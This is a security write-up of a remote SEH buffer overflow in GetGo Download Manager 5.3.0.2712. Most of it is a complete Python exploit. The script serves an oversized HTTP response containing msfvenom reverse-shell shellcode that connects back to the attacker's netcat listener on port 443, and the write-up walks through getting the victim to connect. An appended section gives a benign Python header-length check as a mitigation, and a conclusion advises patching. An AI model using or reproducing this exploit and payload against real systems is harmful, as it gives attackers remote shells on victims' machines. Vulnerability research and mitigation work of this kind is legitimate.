GetGo Download Manager Version 5.3.0.2712 | Remote Buffer Overflow (SEH) | Lucideus Research

Introduction 
GetGo Download Manager is a fully featured free download manager with an integrated web video downloader. It can increase download speeds by up to 5 times and can resume and schedule downloads. Comprehensive error recovery and resume capability restart broken or interrupted downloads caused by lost connections, network problems, computer shutdowns, or unexpected power outages. A simple yet modern graphical user interface makes GetGo user friendly and easy to use.

GetGo Download Manager has a smart download engine that intelligently segments a file across multiple threads to accelerate downloads. It supports proxy servers, the FTP, HTTP and HTTPS protocols, firewalls, redirects, cookies and authorization.

Download Vulnerable Version: GetGo Download Manager Version 5.3.0.2712

Lab Environment
Attacker Machine: Kali Linux 2017.3 with NetCat
Tested On: Windows XP SP3

Exploitation

Step 1: Set up a NetCat listener on port 443 on the attacking machine, then run the GetGo.py script below on the attacking machine (the script itself listens on port 80 and serves the oversized HTTP response).

# python GetGo.py


#!/usr/bin/python
import sys
import socket
import os
import time
 
host = "192.168.2.191"
port = 80
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] listening on %d ..." % port
 
bz, addr = s.accept()
print "[+] connection accepted from %s" % addr[0]
 
junk = "A"*20
#jump 6
nseh = "\xeb\x06\x90\x90"          
 
#0x72d11f39 : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [msacm32.drv]
seh = "\x39\x1f\xd1\x72"

#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.191 LPORT=443 -b "\x00" -f c
#Payload size: 351 bytes

reverse = ("\xd9\xeb\xd9\x74\x24\xf4\x5f\x2b\xc9\xba\xbe\x91\xb4\x8e\xb1"
"\x52\x31\x57\x17\x83\xef\xfc\x03\xe9\x82\x56\x7b\xe9\x4d\x14"
"\x84\x11\x8e\x79\x0c\xf4\xbf\xb9\x6a\x7d\xef\x09\xf8\xd3\x1c"
"\xe1\xac\xc7\x97\x87\x78\xe8\x10\x2d\x5f\xc7\xa1\x1e\xa3\x46"
"\x22\x5d\xf0\xa8\x1b\xae\x05\xa9\x5c\xd3\xe4\xfb\x35\x9f\x5b"
"\xeb\x32\xd5\x67\x80\x09\xfb\xef\x75\xd9\xfa\xde\x28\x51\xa5"
"\xc0\xcb\xb6\xdd\x48\xd3\xdb\xd8\x03\x68\x2f\x96\x95\xb8\x61"
"\x57\x39\x85\x4d\xaa\x43\xc2\x6a\x55\x36\x3a\x89\xe8\x41\xf9"
"\xf3\x36\xc7\x19\x53\xbc\x7f\xc5\x65\x11\x19\x8e\x6a\xde\x6d"
"\xc8\x6e\xe1\xa2\x63\x8a\x6a\x45\xa3\x1a\x28\x62\x67\x46\xea"
"\x0b\x3e\x22\x5d\x33\x20\x8d\x02\x91\x2b\x20\x56\xa8\x76\x2d"
"\x9b\x81\x88\xad\xb3\x92\xfb\x9f\x1c\x09\x93\x93\xd5\x97\x64"
"\xd3\xcf\x60\xfa\x2a\xf0\x90\xd3\xe8\xa4\xc0\x4b\xd8\xc4\x8a"
"\x8b\xe5\x10\x1c\xdb\x49\xcb\xdd\x8b\x29\xbb\xb5\xc1\xa5\xe4"
"\xa6\xea\x6f\x8d\x4d\x11\xf8\x72\x39\x1b\x47\x1a\x38\x1b\xb6"
"\x60\xb5\xfd\xd2\x86\x90\x56\x4b\x3e\xb9\x2c\xea\xbf\x17\x49"
"\x2c\x4b\x94\xae\xe3\xbc\xd1\xbc\x94\x4c\xac\x9e\x33\x52\x1a"
"\xb6\xd8\xc1\xc1\x46\x96\xf9\x5d\x11\xff\xcc\x97\xf7\xed\x77"
"\x0e\xe5\xef\xee\x69\xad\x2b\xd3\x74\x2c\xb9\x6f\x53\x3e\x07"
"\x6f\xdf\x6a\xd7\x26\x89\xc4\x91\x90\x7b\xbe\x4b\x4e\xd2\x56"
"\x0d\xbc\xe5\x20\x12\xe9\x93\xcc\xa3\x44\xe2\xf3\x0c\x01\xe2"
"\x8c\x70\xb1\x0d\x47\x31\xc1\x47\xc5\x10\x4a\x0e\x9c\x20\x17"
"\xb1\x4b\x66\x2e\x32\x79\x17\xd5\x2a\x08\x12\x91\xec\xe1\x6e"
"\x8a\x98\x05\xdc\xab\x88")
 
fill = "D"*(4055 - len(reverse))
 
payload = junk + nseh + seh + reverse + fill
 
buffer = payload + "\r"
buffer+= payload + "\r"
buffer+= payload + "\r\n"
 
print bz.recv(1000)
bz.send(buffer)
print "[+] sending buffer ok\n"
 
time.sleep(3)
bz.close()
s.close()

Step 3: Open the application on the victim machine, go to Download and select New. Enter http://<attacker ip> in the URL field and index.html in the File Name field, then select OK.

Step 4: Check the attacker machine; a remote shell is received through NetCat.

POC Video



Conclusion: GetGo Download Manager should be updated to the patched version from http://www.getgosoft.com/getgodm/thankyou, and the firewall should be configured so that the machine is not reachable remotely by an attacker.
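The root cause visible in the script above is a client that accepts an HTTP response line of several thousand bytes without a length check, so the copy runs past the fixed-size buffer and into the SEH record. A length limit on status and header lines, enforced in the client parser or at a filtering proxy, is the direct mitigation. The following is an added example (not part of the original write-up, nor GetGo's own code) of such a check in Python 3. MAX_LINE_LEN is a hypothetical limit chosen for illustration, and both sample responses are constructed here; the oversized one only mimics the shape of the response (filler bytes separated by bare CR, as the script does) and carries no payload.

```python
import re

# Hypothetical per-line limit for this example; a real client or proxy picks
# its own (a few KB is typical for status and header lines).
MAX_LINE_LEN = 1024

# The script on this page separates its lines with bare "\r" and only ends the
# block with "\r\n". A splitter that honours CRLF alone would see one giant
# line, so all three terminators are treated as line ends.
_LINE_SPLIT = re.compile(rb"\r\n|\r|\n")


def header_lines(raw):
    """Return the status line and header lines, i.e. everything before the
    first blank line. The body (after the blank line) is not inspected."""
    block = []
    for line in _LINE_SPLIT.split(raw):
        if line == b"":
            break
        block.append(line)
    return block


def check_response(raw, max_len=MAX_LINE_LEN):
    """Flag the first status/header line longer than max_len.

    Returns {"ok": True, "line": None, "length": None} for a well-formed
    block, otherwise the zero-based index and length of the offending line.
    """
    for idx, line in enumerate(header_lines(raw)):
        if len(line) > max_len:
            return {"ok": False, "line": idx, "length": len(line)}
    return {"ok": True, "line": None, "length": None}


# Constructed sample inputs (not captured traffic).
BENIGN = (b"HTTP/1.1 200 OK\r\n"
          b"Content-Type: text/html\r\n"
          b"Content-Length: 5\r\n"
          b"\r\n"
          b"hello")

# Three 4096-byte filler lines separated by bare CR, ending with CRLF:
# the same framing the script uses, with inert filler in place of any payload.
OVERSIZED = (b"X" * 4096 + b"\r") * 2 + b"X" * 4096 + b"\r\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(name, check_response(sample))
```

Running the block prints an ok result for the benign response and a rejection of line 0 (length 4096) for the oversized one. A proxy that enforces this check drops the response before it reaches a client parser that cannot handle it; the check is deliberately independent of whether the content looks like an exploit, because the defect is in the client's handling of length, not in the bytes themselves.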